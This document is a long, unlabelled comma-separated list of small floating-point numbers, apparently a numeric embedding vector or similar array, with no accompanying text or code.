-0.004561497364193201, 0.01802091673016548, -0.004827834665775299, -0.022552402690052986, 0.02190719172358513, -0.011463763192296028, 0.021186955273151398, 0.012371561489999294, -0.008642837405204773, -0.005653105676174164, 0.00847778283059597, -0.003696838626638055, -0.01218399964272976, -0.03139030560851097, -0.03535160422325134, 0.0023032561875879765, -0.03571172431111336, -0.012048955075442791, -0.0011919537791982293, -0.0032429397106170654, 0.002179465489462018, 0.029379645362496376, -0.005510558839887381, 0.005776896607130766, -0.007168603129684925, -0.0040625836700201035, -0.008402758277952671, 0.01751074753701687, -0.017405714839696884, -0.034991487860679626, 0.008605324663221836, -0.008897921070456505, -0.0015408183680847287, 0.005844418425112963, 0.003558042924851179, 0.011508777737617493, -0.003747480222955346, 0.002173838671296835, -0.014209664426743984, 0.02939464896917343, 0.006058238912373781, 0.03859267011284828, -0.008815393783152103, -0.008822896517813206, -0.029244599863886833, -0.01228153146803379, -0.004280155058950186, 0.00041380772017873824, 0.005675613414496183, -0.004824083764106035, 0.013009270653128624, 0.023947861045598984, 0.01583019644021988, -0.013586960732936859, 0.003863768419250846, 0.006797231268137693, -0.009363073855638504, -0.031120216473937035, 0.021021900698542595, -0.009460605680942535, -0.023767802864313126, 0.03619188070297241, -0.0010118946665897965, 0.01629534922540188, 0.019221309572458267, 0.05353757366538048, -0.008717861957848072, 0.016430392861366272, -0.0003962238261010498, 0.018065931275486946, -0.008575314655900002, -0.01251410786062479, 0.008207694627344608, -0.0013429408427327871, 0.03160037472844124, 0.011801374144852161, 0.03256068751215935, 0.006568406242877245, 0.005019147880375385, -0.011808876879513264, -0.0010709766065701842, -0.030249930918216705, 0.012911738827824593, 0.005690617952495813, -0.0055555738508701324, -0.011958925984799862, 0.006628425791859627, -0.008402758277952671, 0.014832369051873684, -0.013001767918467522, 0.006812236271798611, -0.00270838919095695, -0.022057240828871727, 0.02951468899846077, -0.029964836314320564, -0.035951800644397736, -0.0006658436032012105, -0.03859267011284828, -0.003965051844716072, -0.01568014733493328, 0.007344911340624094, 0.02106691524386406, -0.026318639516830444, 0.01770581305027008, 0.03370106220245361, 0.021607093513011932, -0.008582817390561104, 0.02312259003520012, 0.00829022191464901, 0.002702762372791767, -0.0019750234205275774, 0.02415793016552925, 0.0024758127983659506, 0.017930885776877403, -0.01456978265196085, -0.012821708805859089, 0.00894293561577797, -0.03487144783139229, 0.02271745726466179, 0.016565438359975815, -0.009062975645065308, 0.03154035285115242, -0.016940562054514885, -0.003771863179281354, -0.030595043674111366, 0.0032954567577689886, 0.0021194457076489925, -0.024953192099928856, 0.012491600587964058, -0.001263227197341621, 0.008747871965169907, 0.014442240819334984, -0.009610654786229134, 0.012026447802782059, -0.008102660067379475, 0.017540758475661278, -0.03382110223174095, -0.00533800246194005, 0.021427033469080925, -0.03883274644613266, 0.013466920703649521, -0.03574173152446747, -0.007059817668050528, -0.007592492271214724, -0.03406118229031563, -0.04204380139708519, -0.027474019676446915, 0.00048578446148894727, -0.02676878683269024, -0.0036424456629902124, 0.011418748646974564, 0.018681133165955544, 0.024443024769425392, -0.009738196618855, -0.042433928698301315, 0.009633162058889866, -0.019746482372283936, 0.013534443452954292, 0.005574329756200314, -0.013879556208848953, 0.0015098706353455782, 0.0197914969176054, 0.0012304038973525167, -0.021457044407725334, 0.0013420030009001493, 0.02060176245868206, -0.011673832312226295, -0.013962083496153355, -0.005086669698357582, 0.017555763944983482, 0.006242048926651478, 0.02841932885348797, -0.017660798504948616, 0.008680349215865135, 0.025268295779824257, 0.0202566497027874, 0.009843231178820133, 0.0013073041336610913, 0.023182610049843788, 0.014067118056118488, 0.03379109129309654, -0.01084856130182743, -0.0026840060018002987, -0.03562169522047043, -0.019191300496459007, -0.004625268280506134, 0.04900608956813812, 0.006572157610207796, -0.032710738480091095, -0.0016589821316301823, -0.021021900698542595, -0.0021306995768100023, -0.0038375097792595625, 0.03946295380592346, -0.01982150785624981, -0.018381034955382347, -0.0013420030009001493, 0.014224669896066189, 0.06812236458063126, -0.01883118227124214, -0.010353398509323597, -0.002535832580178976, -0.0022451120894402266, 0.0038262561429291964, -0.00009671143925515935, -0.005983214359730482, -0.0007328968495130539, -0.019236315041780472, 0.031870462000370026, -0.019116275012493134, -0.02340768463909626, -0.006268307566642761, 0.00758874136954546, 0.008215196430683136, -0.004606512375175953, 0.01689554564654827, -0.0005378327914513648, -0.019341349601745605, 0.008410261012613773, -0.012244019657373428, 0.011823881417512894, -0.029904816299676895, -0.0012153990101069212, -0.014344708994030952, -0.008110162802040577, 0.014389723539352417, -0.01565013825893402, -0.02702387236058712, 0.027444008737802505, 0.016595447435975075, -0.05410776287317276, 0.018561093136668205, -0.005870677065104246, -0.025283299386501312, 0.030715083703398705, -0.029679743573069572, -0.020646778866648674, -0.006744713988155127, -0.016385378316044807, -0.016595447435975075, -0.03244065120816231, -0.019371358677744865, -0.013631975278258324, 0.04600510373711586, 0.025658423081040382, -0.0430041179060936, -0.006969788111746311, 0.00007613827619934455, 0.002352022100239992, 0.023212620988488197, -0.0064596207812428474, 0.011553793214261532, -0.013534443452954292, 0.017255663871765137, -0.013752014376223087, 0.0065421476028859615, -0.013106802478432655, -0.0032035517506301403, 0.0011338096810504794, 0.024112915620207787, 0.0010484692174941301, 0.006774723995476961, 0.009618157520890236, -0.023737791925668716, 0.002440175972878933, 0.022822491824626923, -0.023272639140486717, -0.0053079924546182156, -0.03931290656328201, -0.013669487088918686, -0.012131482362747192, -0.012971758842468262, -0.02100689709186554, -0.005247972905635834, 0.010495945811271667, 0.018621113151311874, -0.0012182124191895127, -0.007907595485448837, 0.009122994728386402, 0.009775709360837936, -0.018321014940738678, -0.0058969357050955296, -0.017135625705122948, 0.011493773199617863, 0.005536817479878664, -0.0045239850878715515, 0.005090421065688133, -0.008530300110578537, -0.03628190979361534, 0.03475140780210495, 0.03142031654715538, 0.02331765554845333, -0.020061586052179337, -0.006474625319242477, -0.01788587123155594, 0.017555763944983482, 0.03175042197108269, -0.02546335943043232, 0.020421704277396202, 0.008485285565257072, 0.021637102589011192, -0.007341159973293543, 0.01377452164888382, 0.0038525147829204798, 0.0022863755002617836, 0.026888826861977577, -0.0029597217217087746, -0.0026539962273091078, 0.009820723906159401, -0.012724176980555058, -0.010781039483845234, -0.0003366730234120041, 0.009858236648142338, 0.0028528114780783653, 0.012101472355425358, -0.009978275746107101, -0.009062975645065308, 0.017435723915696144, 0.016715487465262413, -0.03799247369170189, 0.0046365219168365, -0.008005128242075443, -0.008762876503169537, 0.02172713167965412, 0.019101271405816078, 0.000026595644158078358, -0.00434767734259367, -0.028374314308166504, -0.006830992642790079, -0.002070679794996977, -0.012161492370069027, 0.005716876592487097, -0.011928915977478027, 0.016070276498794556, 0.012199005112051964, 0.017525753006339073, -0.001228528330102563, -0.00031580679933540523, -0.01011332031339407, 0.010135827586054802, -0.015755172818899155, -0.001417965511791408, -0.007735039107501507, 0.02552337944507599, 0.012919241562485695, 0.02702387236058712, -0.021547073498368263, -0.0032091785687953234, -0.009985778480768204, 0.024923181161284447, 0.003983807750046253, 0.016820522025227547, 0.004932869225740433, -0.00348301837220788, -0.03550165519118309, -0.005000391509383917, -0.044864729046821594, 0.01084856130182743, -0.030369969084858894, -0.013271857053041458, 0.00823020190000534, 0.01571015827357769, -0.009730694815516472, -0.026408668607473373, -0.010886074043810368, -0.004599009640514851, -0.008800389245152473, 0.008687851950526237, 0.00885290652513504, -0.017615782096982002, -0.02007659152150154, 0.001435783808119595, 0.057618916034698486, 0.04306413605809212, 0.0033704815432429314, -0.011321216821670532, 0.007206115406006575, 0.024112915620207787, -0.02019662968814373, -0.0010597228538244963, -0.007855079136788845, 0.019806502386927605, 0.02676878683269024, -0.04459463804960251, 0.025613408535718918, 0.0052329679019749165, 0.02393285743892193, 0.017255663871765137, -0.009528127498924732, -0.014119635336101055, 0.01574016734957695, 0.02667875774204731, -0.0019468890968710184, -0.005893184803426266, -0.00446396553888917, 0.04627519100904465, 0.0011141157010570168, 0.019521407783031464, 0.0027477771509438753, 0.010781039483845234, -0.03703215718269348, 0.002768408739939332, -0.006613421253859997, 0.010668502189218998, 0.0018474814714863896, 0.014157147146761417, -0.019221309572458267, 0.012761689722537994, 0.00384126091375947, -0.018276000395417213, -0.0019187548896297812, -0.011613812297582626, -0.03535160422325134, 0.0011103645665571094, 0.010886074043810368, -0.018065931275486946, -0.015057442709803581, -0.002888448303565383, -0.037092175334692, -0.02207224629819393, 0.021652108058333397, 0.0007197675295174122, -0.004043827299028635, -0.005593086127191782, 0.008807891048491001, -0.008567812852561474, -0.0012125856010243297, 0.04201379418373108, -0.02739899419248104, 0.009228029288351536, 0.0031041440088301897, -0.014659812673926353, 0.006695948075503111, 0.010030793026089668, 0.03457134962081909, -0.007528721354901791, -0.02667875774204731, -0.025358324870467186, -0.008560310117900372, -0.00784007366746664, -0.010668502189218998, 0.01571015827357769, -0.013902063481509686, 0.00131480663549155, 0.01620532013475895, 0.0032935813069343567, 0.0013251225464046001, 0.007862580940127373, -0.019341349601745605, -0.0007488395785912871, -0.007059817668050528, 0.025508373975753784, 0.0091154919937253, -0.016760502010583878, 0.002267619362100959, 0.0036236895248293877, 0.02300255186855793, 0.021922197192907333, 0.021186955273151398, -0.0006949156522750854, -0.010615984909236431, -0.0075737363658845425, 0.03157036378979683, -0.015500088222324848, 0.02349771372973919, 0.011898905970156193, 0.0006086372886784375, -0.011748856864869595, -0.0066621871665120125, 0.027654077857732773, 0.002935338532552123, 0.012071463279426098, 0.011133654974400997, -0.005244221538305283, 0.010841058567166328, 0.03079010732471943, -0.029319625347852707, -0.00392003683373332, 0.013962083496153355, -0.013714502565562725, -0.02147204801440239, 0.013489427976310253, -0.005773145239800215, 0.005930697079747915, -0.003149158786982298, 0.005608091130852699, 0.014757344499230385, -0.01290423609316349, -0.00023281080939341336, -0.0030178658198565245, 0.04102346673607826, -0.0028096723835915327, 0.0058969357050955296, -0.008297723717987537, 0.019716473296284676, 0.007832570932805538, -0.010818551294505596, -0.0024064150638878345, 0.01393207348883152, 0.014389723539352417, -0.0008782570366747677, 0.004246394149959087, 0.006744713988155127, -0.0037493559066206217, 0.015425063669681549, -0.015057442709803581, -0.0048465910367667675, -0.010593477636575699, -0.007607497274875641, 0.0006316135986708105, -0.008950438350439072, -0.015590118244290352, -0.0029390898998826742, -0.02705388143658638, 0.011441255919635296, -0.019206305965781212, 0.000830428849440068, -0.022087249904870987, -0.007596243638545275, 0.02531331032514572, 0.0022169777657836676, -0.017495743930339813, 0.012634147889912128, 0.0036236895248293877, 0.007967615500092506, 0.005484300199896097, -0.02216227538883686, -0.015410059131681919, 0.020436709746718407, -0.0015670768916606903, -0.008410261012613773, -0.035951800644397736, 0.013616969808936119, 0.004944122862070799, -0.009835728444159031, -0.010893575847148895, -0.009558137506246567, -0.013894561678171158, 0.005067913793027401, -0.017210649326443672, 0.03730224445462227, 0.021111929789185524, -0.01517748273909092, -0.004355179611593485, -0.01773582212626934, 0.019206305965781212, 0.005086669698357582, 0.0011619438882917166, 0.00562684703618288, 0.0036368188448250294, -0.013414403423666954, 0.010871068574488163, 0.002196345943957567, 0.0021231970749795437, -0.009558137506246567, 0.01517748273909092, -0.051256828010082245, 0.02193720079958439, 0.007922600954771042, 0.007074822671711445, -0.005713125690817833, 0.0007305523031391203, -0.030024856328964233, -0.004377686884254217, 0.02450304478406906, 0.0005448663723655045, -0.01929633505642414, -0.0035430381540209055, 0.014277187176048756, -0.006891012191772461, 0.019116275012493134, -0.021457044407725334, 0.003529908834025264, 0.006891012191772461, -0.002331390278413892, -0.00931805931031704, -0.012461590580642223, -0.0028471846599131823, 0.017000580206513405, 0.0027252696454524994, -0.008665344677865505, -0.02331765554845333, -0.03328092396259308, -0.012821708805859089, 0.02022664062678814, -0.017060600221157074, 0.025673428550362587, -0.014607295393943787, 0.003781241364777088, -0.0063958498649299145, 0.024067901074886322, -0.016070276498794556, -0.0294546689838171, -0.014967413619160652, -0.01982150785624981, -0.008177684620022774, 0.006718455348163843, 0.028254276141524315, 0.030505014583468437, 0.012881728820502758, -0.009633162058889866, -0.01258913241326809, -0.016010256484150887, -0.004107598215341568, 0.0026333644054830074, -0.006197034381330013, -0.007502462714910507, -0.03610185161232948, 0.014464748091995716, -0.015079950913786888, -0.005668110679835081, 0.011373734101653099, 0.003522406332194805, -0.0018577973823994398, 0.012806704267859459, -0.022042235359549522, 0.006647182162851095, -0.009820723906159401, 0.023857831954956055, 0.021742137148976326, 0.021982217207551003, -0.0014114008517935872, -0.007112334948033094, 0.015980245545506477, -0.0333409458398819, -0.008567812852561474, -0.008237704634666443, -0.034391291439533234, 0.012461590580642223, -0.009760703891515732, -0.008650340139865875, 0.004085090942680836, 0.01652042381465435, 0.029154570773243904, -0.000738523667678237, -0.00113005843013525, 0.008995452895760536, -0.01568014733493328, -0.007483706809580326, 0.030279939994215965, 0.009092984721064568, -0.0186961367726326, -0.027188925072550774, 0.011898905970156193, 0.030099881812930107, 0.01006830483675003, 0.004103847313672304, 0.03136029466986656, -0.00434767734259367, 0.0026221107691526413, -0.007412433158606291, 0.020526738837361336, 0.004887854680418968, 0.0377223826944828, 0.001660857698880136, 0.01845605857670307, -0.00648212805390358, 0.02381281740963459, -0.020241644233465195, -0.0022976293694227934, 0.022207289934158325, -0.03202051296830177, 0.01991153694689274, -0.009107990190386772, 0.017150629311800003, -0.0005223589832894504, -0.02699386142194271, -0.0016796138370409608, -0.0032260590232908726, 0.020961880683898926, -0.027639074251055717, -0.00442645326256752, 0.026693763211369514, -0.010420921258628368, 0.038202542811632156, 0.015320029109716415, 0.0010737900156527758, -0.0314803346991539, -0.01805092580616474, 0.007757546845823526, 0.0019768988713622093, -0.01400709804147482, 0.02222229540348053, -0.012011443264782429, 0.0115312859416008, 0.00028978261980228126, 0.001268854015506804, 0.0025733448565006256, -0.014517265371978283, -0.011606310494244099, 0.00665468443185091, -0.0011159913847222924, -0.005034152418375015, 0.04369434341788292, 0.003886275691911578, -0.0026840060018002987, 0.0056868670508265495, 0.009505620226264, -0.013669487088918686, 0.020871851593255997, -0.009993280284106731, -0.014487256295979023, -0.006981041748076677, -0.0058969357050955296, -0.013241847045719624, 0.002669001230970025, 0.0020556747913360596, 0.017555763944983482, 0.008687851950526237, 0.001452664379030466, -0.021216964349150658, 0.011853891424834728, -0.02649869956076145, 0.015072448179125786, -0.012484097853302956, -0.02048172429203987, 0.008267713710665703, 0.0010597228538244963, -0.0037099679466336966, -0.024518048390746117, -0.001343878684565425, 0.018215980380773544, 0.004013817757368088, 0.009077980183064938, -0.013872053474187851, -0.0008201129967346787, 0.0013738885754719377, 0.010405915789306164, 0.04213383048772812, 0.0070673199370503426, 0.00925803929567337, -0.012409073300659657, 0.021922197192907333, 0.0014320325572043657, -0.00805764552205801, 0.002785289427265525, 0.02537333033978939, 0.002331390278413892, 0.017780836671590805, -0.005776896607130766, 0.030054867267608643, 0.023662768304347992, -0.01255912333726883, -0.002051923656836152, -0.004171369597315788, -0.003160412423312664, -0.005443037021905184, 0.005713125690817833, 0.00027876338572241366, -0.010540960356593132, 0.021517064422369003, 0.025268295779824257, -0.02384282648563385, 0.008237704634666443, -0.012131482362747192, -0.010008285753428936, 0.0008487161248922348, 0.002310758689418435, 0.013166822493076324, -0.018816176801919937, -0.004400194622576237, 0.004340174607932568, -0.00027946673799306154, 0.023452699184417725, 0.0025677180383354425, -0.0033723569940775633, -0.008492788299918175, 0.01336938887834549, 0.01742071844637394, -0.00331983994692564, 0.0056230961345136166, 0.009265542030334473, -0.0020275407005101442, 0.010540960356593132, 0.0026371157728135586, -0.00005415840496425517, -0.002674628049135208, 0.010233359411358833, -0.0021869679912924767, -0.013669487088918686, 0.006861002184450626, 0.012011443264782429, -0.008747871965169907, 0.013241847045719624, 0.001487363246269524, 0.005968209356069565, 0.011201176792383194, -0.011621315032243729, -0.01892121136188507, 0.014389723539352417, -0.011343724094331264, 0.018501073122024536, 0.006515888962894678, 0.0014095251681283116, -0.006272058933973312, -0.016430392861366272, -0.012604137882590294, -0.005135436076670885, 0.001267916290089488, 0.012416576035320759, 0.0108335567638278, -0.011786369606852531, 0.026978855952620506, -0.007119837217032909, 0.000012140216313127894, 0.006778475362807512, -0.00423138914629817, 0.0051054260693490505, -0.009228029288351536, -0.00032612268114462495, 0.0071310908533632755, -0.00925803929567337, 0.0038187536410987377, 0.0027759112417697906, 0.04039325937628746, -0.0028828214854002, -0.002310758689418435, 0.005776896607130766, -0.01565013825893402, -0.011261196807026863, 0.0021194457076489925, 0.017975900322198868, 0.010383408516645432, -0.004992889240384102, -0.00719861313700676, -0.012461590580642223, -0.0026896330527961254, -0.012206506915390491, 0.011771364137530327, -0.0071798572316765785, 0.01938636414706707, -0.022822491824626923, 0.011418748646974564, 0.0033873619977384806, 0.010540960356593132, -0.012259024195373058, -0.01399209350347519, -0.017540758475661278, -0.0007558731595054269, -0.004899108316749334, 0.0002618828439153731, 0.015695152804255486, 0.0009997031884267926, 0.011973930522799492, 0.022867506369948387, -0.0038600172847509384, -0.01338439341634512, -0.006455869413912296, 0.02066178247332573, 0.020391693338751793, 0.00306663173250854, -0.03883274644613266, -0.009017960168421268, 0.010563467629253864, -0.013857048936188221, -0.009130497463047504, -0.0008280843612737954, 0.010255866684019566, 0.010563467629253864, 0.03298082575201988, 0.009888245724141598, -0.020046580582857132, -0.012536615133285522, 0.0036855849903076887, 0.0014048361917957664, 0.009963271208107471, -0.006343332584947348, 0.0051429383456707, 0.00667719217017293, 0.020376689732074738, -0.002057550475001335, 0.011021117679774761, 0.0029503435362130404, 0.011291206814348698, 0.013091797940433025, 0.0019994063768535852, 0.019596433266997337, -0.01154629047960043, 0.01511746272444725, -0.005101674702018499, 0.004486472811549902, -0.006065741181373596, -0.003458635415881872, -0.005236719269305468, 0.001844668062403798, 0.007078573573380709, 0.003741853404790163, -0.02300255186855793, -0.012679162435233593, -0.0034323767758905888, -0.002772160107269883, 0.02655871957540512, 0.007885088212788105, 0.012776694260537624, 0.002331390278413892, -0.0049103619530797005, 0.012191502377390862, 0.004876601044088602, -0.007348662242293358, -0.02418794110417366, -0.02132199890911579, -0.0002984573657158762, -0.018711142241954803, 0.027849141508340836, -0.0062833125703036785, -0.008312729187309742, 0.004876601044088602, 0.012274029664695263, 0.003863768419250846, -0.01533503457903862, -0.011283704079687595, 0.016790511086583138, 0.02216227538883686, -0.020001566037535667, 0.010315886698663235, 0.01132871862500906, -0.013729507103562355, 0.005923194345086813, -0.011613812297582626, -0.006103253457695246, -0.0091154919937253, -0.02465309388935566, 0.002860313979908824, 0.0115312859416008, -0.007648760918527842, 0.005529315210878849, -0.018005911260843277, -0.00378311681561172, -0.010593477636575699, 0.0061445171013474464, -0.023197615519165993, 0.01707560569047928, -0.026933841407299042, 0.012581630609929562, -0.005668110679835081, 0.009925758466124535, 0.0009659421048127115, -0.011636319570243359, -0.03493146598339081, 0.014824866317212582, 0.008492788299918175, -0.0021250725258141756, -0.015935231000185013, 0.00029728509252890944, -0.006493381690233946, -0.028404325246810913, 0.025628414005041122, -0.004970381502062082, 0.02063177339732647, 0.000400912860641256, -0.009130497463047504, -0.008252709172666073, -0.013902063481509686, 0.020616767928004265, -0.009618157520890236, 0.0019956552423536777, 0.012536615133285522, -0.006058238912373781, -0.007780054118484259, -0.0036311920266598463, -0.01938636414706707, 0.031210245564579964, 0.004929118324071169, -0.00442645326256752, 0.016535427421331406, -0.012221512384712696, 0.02225230447947979, -0.010713516734540462, -0.019776491448283195, -0.005930697079747915, -0.01519248727709055, -0.003379859495908022, 0.01011332031339407, 0.024383004754781723, 0.012454088777303696, 0.00739367725327611, 0.01109614223241806, -0.00003094765997957438, -0.002640866907313466, -0.020826837047934532, -0.008185187354683876, -0.0225974190980196, 0.017180640250444412, 0.02253739908337593, 0.01820097491145134, 0.0007005424704402685, 0.024322984740138054, -0.019806502386927605, -0.011921413242816925, -0.013767019845545292, 0.015139969997107983, -0.010000783018767834, 0.018125951290130615, -0.007855079136788845, 0.013496930710971355, 0.01432220172137022, 0.033611033111810684, -0.01006830483675003, 0.0014414107427001, 0.003286078805103898, -0.006031980272382498, 0.014217167161405087, -0.009107990190386772, 0.014764847233891487, 0.002779662609100342, 0.007787556387484074, -0.016745496541261673, 0.02132199890911579, 0.013144315220415592, -0.00807265006005764, -0.015530098229646683, 0.007322403602302074, -0.010495945811271667, -0.0007694713422097266, 0.011396241374313831, 0.02349771372973919, 0.005536817479878664, 0.009138000197708607, -0.016775507479906082, 0.01707560569047928, -0.02412792108952999, 0.00029564392752945423, 0.016040265560150146, 0.0015867708716541529, -0.018651122227311134, 0.014157147146761417, 0.006624674890190363, -0.0061445171013474464, 0.01533503457903862, 0.0014170276699587703, 0.022267309948801994, 0.016850531101226807, -0.03322090581059456, -0.006298317573964596, 0.015815190970897675, -0.002548961667343974, -0.011306211352348328, -0.004280155058950186, -0.010871068574488163, -0.005529315210878849, 0.014044610783457756, 0.023272639140486717, -0.007945108227431774, 0.0011469390010461211, 0.011351226828992367, 0.015004925429821014, 0.0036218140739947557, -0.0008088593021966517, 0.0004682005674112588, 0.006943529471755028, 0.005994467996060848, 0.00041263544699177146, 0.0015267512062564492, -0.0010653497884050012, 0.0016758627025410533, -0.015845201909542084, 0.008357743732631207, 0.014839871786534786, -0.009768206626176834, -0.01883118227124214, 0.004377686884254217, 0.022522393614053726, -0.0024945689365267754, -0.011291206814348698, -0.0045877560041844845, 0.015695152804255486, -0.00044897550833411515, -0.002963472856208682, 0.008342739194631577, 0.006001970265060663, -0.022447368130087852, -0.007104832213371992, 0.004835337400436401, -0.01829100400209427, 0.018245989456772804, -0.003938793204724789, -0.017225654795765877, -0.0036424456629902124, -0.009873241186141968, -0.016595447435975075, -0.015980245545506477, -0.009310556575655937, 0.03292080760002136, -0.007483706809580326, -0.026138581335544586, 0.008410261012613773, -0.00719861313700676, -0.010083310306072235, -0.0005903500714339316, 0.01011332031339407, -0.01187639869749546, 0.005461792927235365, -0.018561093136668205, 0.006789728999137878, -0.00011230249219806865, -0.005060411058366299, 0.008380251005291939, -0.022147269919514656, 0.008237704634666443, -0.023047566413879395, -0.0020613016095012426, -0.016025260090827942, 0.015695152804255486, 0.02673877775669098, -0.0014339082408696413, 0.020331675186753273, -0.008042640052735806, -0.006155770737677813, 0.0068722558207809925, 0.0033761083614081144, -0.01511746272444725, -0.020466718822717667, 0.0008444960112683475, -0.014352211728692055, 0.009145502001047134, 0.011523783206939697, -0.005911940708756447, -0.009092984721064568, -0.006005721632391214, 0.007502462714910507, -0.0324106402695179, -0.013624472543597221, -0.014982418157160282, -0.0003847356711048633, 0.012949250638484955, 0.006527142599225044, -0.005401773378252983, 0.003430501092225313, 0.012649152427911758, -0.018441053107380867, -0.00847778283059597, 0.0049028596840798855, -0.007855079136788845, -0.010743526741862297, 0.02132199890911579, 0.0015370671171694994, -0.0009875117102637887, 0.004478970542550087, 0.022957537323236465, -0.013181827031075954, -0.01938636414706707, 0.010203349404036999, 0.013399398885667324, -0.002518951892852783, 0.015815190970897675, 0.004899108316749334, 0.02175714261829853, 0.0076300050131976604, -0.01907126046717167, 0.0094305956736207, -0.010090813040733337, -0.017900876700878143, 0.015440069139003754, 0.0074536968022584915, -0.004936620593070984, 0.008252709172666073, -0.018651122227311134, 0.04057332128286362, 0.005052908789366484, -0.0115312859416008, 0.019461389631032944, -0.006384595762938261, -0.006114507094025612, 0.019101271405816078, -0.019266324117779732, 0.023422690108418465, 0.005728130228817463, 0.01290423609316349, 0.009400585666298866, 0.010435925796627998, -0.021577082574367523, -0.004002564121037722, -0.029319625347852707, -0.03571172431111336, 0.015530098229646683, 0.02091686613857746, 0.019086265936493874, -0.031090205535292625, -0.0071310908533632755, -0.0023951611947268248, -0.007720034569501877, -0.03952297568321228, -0.007412433158606291, 0.013024275191128254, -0.007172354497015476, 0.015282517299056053, -0.01494490634649992, -0.021892186254262924, -0.0007057004258967936, -0.002126948209479451, -0.004220135509967804, -0.010743526741862297, 0.009595650248229504, 0.023647762835025787, -0.027338974177837372, -0.0018709267023950815, -0.0014076496008783579, -0.011801374144852161, -0.006384595762938261, -0.004553995095193386, -0.0188611913472414, 0.01826099492609501, -0.010195846669375896, -0.0030928903724998236, -0.014937403611838818, -0.00042810928425751626, 0.004602761007845402, 0.013234344311058521, -0.0006409916677512228, -0.0102858766913414, 0.014464748091995716, -0.017810847610235214, 0.025973526760935783, 0.01377452164888382, 0.0008065147558227181, 0.015380049124360085, -0.022117260843515396, 0.01776583306491375, 0.022402353584766388, -0.016775507479906082, 0.0296047180891037, 0.03232061117887497, 0.0003298739029560238, -0.014037108048796654, 0.023587742820382118, -0.0035205306485295296, -0.015545102767646313, -0.001688992022536695, 0.0024139173328876495, -0.01988152600824833, -0.01727066934108734, 0.009910753928124905, -0.012454088777303696, -0.02309258095920086, -0.03580175340175629, 0.0034229985903948545, 0.031180236488580704, -0.006140765734016895, 0.0040063150227069855, 0.018996236845850945, -0.012401571497321129, 0.018996236845850945, -0.022432364523410797, 0.01536504365503788, -0.009228029288351536, -0.004456462804228067, 0.013631975278258324, 0.012364058755338192, -0.009370576590299606, -0.013496930710971355, 0.006624674890190363, -0.0215020589530468, -0.011681335046887398, -0.020901862531900406, 0.0021382018458098173, -0.0007994812331162393, 0.001884993864223361, 0.011388738639652729, -0.01629534922540188, 0.0006714704213663936, 0.016820522025227547, 0.026753783226013184, 0.011748856864869595, 0.01391706895083189, 0.0008946686866693199, 0.014899891801178455, 0.007337408605962992, -0.01686553657054901, -0.010233359411358833, 0.010023290291428566, 0.003321715397760272, -0.0033873619977384806, -0.004077588673681021, 0.006455869413912296, -0.010811049491167068, -0.006744713988155127, -0.016070276498794556, 0.010143330320715904, 0.00026610298664309084, -0.0007961989031173289, 0.019311338663101196, 0.0030309949070215225, 0.005386768374592066, 0.0035955554340034723, -0.00006365370791172609, 0.005559325218200684, -0.02187718264758587, 0.006778475362807512, -0.007153598591685295, -0.004051330033689737, -0.018711142241954803, -0.007780054118484259, 0.015162477269768715, -0.004411448258906603, 0.01985151693224907, -0.03388112410902977, -0.0010118946665897965, -0.0020744309294968843, -0.016730492934584618, 0.008987950161099434, 0.003875022055581212, 0.002070679794996977, 0.0065421476028859615, -0.0026089814491569996, 0.0008144861203618348, -0.005776896607130766, -0.011606310494244099, 0.010510950349271297, 0.0015248756390064955, -0.0314803346991539, -0.0010766034247353673, -0.008080152794718742, 0.025448353961110115, 0.008050142787396908, 0.0051766992546617985, 0.001908438978716731, 0.019311338663101196, 0.0091154919937253, -0.00180996919516474, 0.005172948352992535, -0.0050491574220359325, 0.030129890888929367, -0.0013917068718001246, 0.010578473098576069, 0.005202957894653082, 0.021276984363794327, -0.012311541475355625, 0.007153598591685295, 0.005833164788782597, -0.006373342126607895, 0.009933261200785637, -0.012138985097408295, 0.017165634781122208, 0.000951406080275774, -0.017525753006339073, -0.004677785560488701, -0.0036424456629902124, 0.015470078215003014, 0.004970381502062082, -0.0026333644054830074, 0.01391706895083189, -0.009580644778907299, -0.006350834853947163, -0.0043214187026023865, 0.011591305024921894, 0.017600778490304947, 0.0009026400512084365, -0.005525563843548298, 0.004130105953663588, -0.017840856686234474, -0.010668502189218998, 0.007386174518615007, -0.01733068935573101, 0.016685478389263153, -0.011411245912313461, 0.009768206626176834, 0.011396241374313831, 0.00007824834028724581, 0.01904125139117241, 0.01471232995390892, 0.010405915789306164, -0.00832023099064827, 0.0063395812176167965, -0.015605122782289982, -0.009918255731463432, 0.04267400875687599, 0.008920428343117237, -0.005458041559904814, 0.016220325604081154, -0.019776491448283195, 0.008545305579900742, -0.0034061181358993053, -0.031030187383294106, -0.00949061568826437, -0.014749841764569283, -0.003663077484816313, 0.019266324117779732, 0.0054993052035570145, -0.00931805931031704, -0.014509763568639755, 0.012101472355425358, -0.014862379059195518, -0.006947280839085579, -0.029589714482426643, 0.000847309420350939, 0.0008674722630530596, 0.010811049491167068, 0.005923194345086813, -0.01848606951534748, 0.0021363263949751854, -0.004272652789950371, 0.0005903500714339316, 0.0028865726199001074, -0.020046580582857132, 0.009580644778907299, 0.026978855952620506, -0.009693182073533535, 0.015079950913786888, 0.0037268484011292458, -0.011193674989044666, 0.012491600587964058, -0.006392098497599363, -0.004929118324071169, -0.018411044031381607, -0.0020613016095012426, -0.011958925984799862, 0.006981041748076677, -0.018651122227311134, -0.0025283300783485174, 0.01472733449190855, 0.012604137882590294, 0.011996437795460224, -0.000011678638657031115, 0.008950438350439072, 0.010976103134453297, -0.03727223724126816, 0.010706014931201935, 0.0054355342872440815, -0.012934246100485325, 0.004899108316749334, 0.0025639666710048914, -0.01707560569047928, 0.0016711736097931862, 0.01649041287600994, -0.008155177347362041, 0.00656090397387743, -0.03079010732471943, -0.00593819934874773, -0.0216671135276556, 0.0057018715888261795, -0.015440069139003754, 0.00790009368211031, -0.00006599822518182918, -0.012244019657373428, 0.010405915789306164, 0.013271857053041458, 0.009325561113655567, 0.012296536937355995, -0.01701558567583561, -0.009213024750351906, 0.013406901620328426, -0.007892590947449207, -0.016565438359975815, -0.016340363770723343, -0.006245800293982029, -0.002048172289505601, -0.009273043833673, 0.01938636414706707, 0.0221322663128376, -0.008822896517813206, 0.008155177347362041, -0.0005518999532796443, -0.026843812316656113, -0.003835634095594287, -0.01860610768198967, -0.0019103146623820066, -0.002774035558104515, 0.0054280320182442665, 0.024983201175928116, 0.009903251193463802, -0.006474625319242477, 0.008372748270630836, -0.012529113329946995, -0.02253739908337593, -0.002927836263552308, 0.0017883996479213238, 0.0012529112864285707, 0.0005903500714339316, 0.0045877560041844845, -0.015327531844377518, 0.003344222903251648, 0.0051054260693490505, -0.00665468443185091, -0.014899891801178455, 0.014052112586796284, 